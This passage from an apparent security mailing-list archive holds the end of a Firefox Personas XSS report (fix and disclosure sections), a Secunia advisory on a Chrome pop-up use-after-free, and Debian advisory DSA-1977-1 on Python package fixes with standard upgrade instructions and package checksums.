webserver, potentially enabling some level of user tracking.

4. FIX

To ensure that Personas cannot be automatically set by malicious websites,
Firefox should follow the model it adopted with browser extensions and prompt
the user before installing any new Persona. In the absence of such a fix, it is
necessary to audit all whitelisted Mozilla hosts for XSS vulnerabilities
(probably a good idea anyway) and hope that site updates don't introduce any
new ones.

5. DISCLOSURE

Since the immediate workaround for this problem is to patch XSS vulnerabilities
on Mozilla webservers, which doesn't require pushing client-side updates,
Mozilla is notified by receiving a copy of this report.

Secunia Research: Google Chrome Pop-Up Block Menu Handling Vulnerability

[Secunia Research]

== 

 Secunia Research 26/01/2010

 - Google Chrome Pop-Up Block Menu Handling Vulnerability -

== 
Table of Contents

Affected Software1
Severity.2
Vendor's Description of Software.3
Description of Vulnerability.4
Solution.5
Time Table...6
Credits..7
References...8
About Secunia9
Verification10

== 
1) Affected Software 

* Google Chrome 3.0.195.38

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Moderately critical
Impact: System compromise
Where:  Remote

== 
3) Vendor's Description of Software 

"Google Chrome runs web pages and applications with lightning speed.".

Product Link:
http://www.google.com/chrome

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Google Chrome, 
which can be exploited by malicious people to potentially compromise 
a user's system.

The vulnerability is caused by a use-after-free error when trying to 
display a blocked pop-up window while navigating away from the 
current site.

Successful exploitation may allow execution of arbitrary code.

== 
5) Solution 

Upgrade to version 4.0.249.78.

== 
6) Time Table 

30/12/2009 - Vendor notified.
30/12/2009 - Vendor response.
26/01/2010 - Public disclosure.

== 
7) Credits 

Discovered by Jakob Balle and Carsten Eiram, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has not 
currently assigned a CVE identifier for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-65/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==

[SECURITY] [DSA-1977-1] New python packages fix several vulnerabilities

[Giuseppe Iuculano]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1977-1  secur...@debian.org
http://www.debian.org/security/Giuseppe Iuculano
January 25, 2010  http://www.debian.org/security/faq
- 

Packages   : python2.4 python2.5
Vulnerability  : several vulnerabilities
Problem type   : local (remote)
Debian-specific: no
CVE Id : CVE-2008-2316 CVE-2009-3560 CVE-2009-3720
Debian Bug : 493797 560912 560913


Jukka Taimisto, Tero Rontti and Rauli Kaksonen discovered that the embedded 
Expat copy
in the interpreter for the Python language, does not properly process malformed 
or
crafted XML files. (CVE-2009-3560 CVE-2009-3720)
This vulnerability could allow an attacker to cause a denial of service while 
parsing
a malformed XML file.

In addition, this update fixes an integer overflow in the hashlib module in 
python2.5.
This vulnerability could allow an attacker to defeat cryptographic digests. 
(CVE-2008-2316)
It only affects the oldstable distribution (etch).


For the oldstable distribution (etch), these problems have been fixed in
version 2.4.4-3+etch3 for python2.4 and version 2.5-5+etch2 for python2.5.

For the stable distribution (lenny), these problems have been fixed in
version 2.4.6-1+lenny1 for python2.4 and version 2.5.2-15+lenny1 for python2.5.

For the unstable distribution (sid), these problems have been fixed in
version 2.5.4-3.1 for python2.5, and will migrate to the testing distribution 
(squeeze)
shortly.
python2.4 has been removed from the testing distribution (squeeze), and it will
be removed from the unstable distribution soon.


We recommend that you upgrade your python packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian (oldstable)
- --

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/p/python2.5/python2.5_2.5-5+etch2.dsc
Size/MD5 checksum: 1313 61c8f540d768731518e649f759ad1500
  
http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.4-3+etch3.dsc
Size/MD5 checksum: 1210 647efe66b35aa00c2f0416e41920fdf8
  
http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.4.orig.tar.gz
Size/MD5 checksum:  9508940 f74ef9de91918f8927e75e8c3024263a
  
http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.4-3+etch3.diff.gz
Size/MD5 checksum:   207460 c9b1b80a1aae12db910e353dab5cd0fb
  
http://security.debian.org/pool/updates/main/p/python2.5/python2.5_2.5-5+etch2.diff.gz
Size/MD5 checksum:   271887 2d1944512d0eaa925a4a158b2c3a5845
  
http://security.debian.org/pool/updates/main/p/python2.5/python2.5_2.5.orig.tar.gz
Size/MD5 checksum: 11010528 2ce301134620012ad6dafb27bbcab7eb

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/p/python2.5/idle-python2.5_2.5-5+etch2_all.deb
Size/MD5 checksum:62226 9de6fad0cf4c106d77c4189ecf3f0fab
  
http://security.debian.org/pool/updates/main/p/python2.4/python2.4-examples_2.4.4-3+etch3_all.deb
Size/MD5 checksum:   589766 e33c071f8e1864e1c5a63d2e39f21d2f
  
http://security.debian.org/pool/updates/main/p/python2.5/python2.5-examples_2.5-5+etch2_all.deb
Size/MD5 checksum:   645704 8732b224b59cd6488596117d074831f9
  
http://security.debian.org/pool/updates/main/p/python2.4/idle-python2.4_2.4.4-3+etch3_all.deb
Size/MD5 checksum:60154 8ac06e4c9ad4c1830ee90ece429690fe

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/p/python2.4/python2.4_2.4.4-3+etch3_alpha.deb
Size/MD5 checksum:  2943634 e5ab4789b18f9ac953b6b101ec897616
  
http://security.debian.org/pool/updates/main/p/python2.5/python2.5-dbg_2.5-5+etch2_alpha.deb
Size/MD5 checksum:  6082828 772c99f5e8dc4e7c9306ba4a61837565
  
http://security.debian.org/pool/updates/main/p/python2.4/python2.4-dev_2.4.4-3+etch3_alpha.deb
Size/MD5 checksum:  1850092 a19fd86a326d42a31ed75d1f1272d94c
  
http://security.debian.org/pool/updates/main/p/python2.5/python2.5-minimal_2.5-5+etch2_alpha.deb
Size/MD5 checksum:   849306 6c7cfd716177bc3677729ef27cd533ff
  
http://security.debian.org/pool/updates/main/p/python2.4/python2.4-dbg_2.4.4-3+etch3_alpha.deb
Size/MD5 checksum:  5248986 20d49174384d0533b25edfbc6f03
  
http://security.debian.org/pool/updates/main/p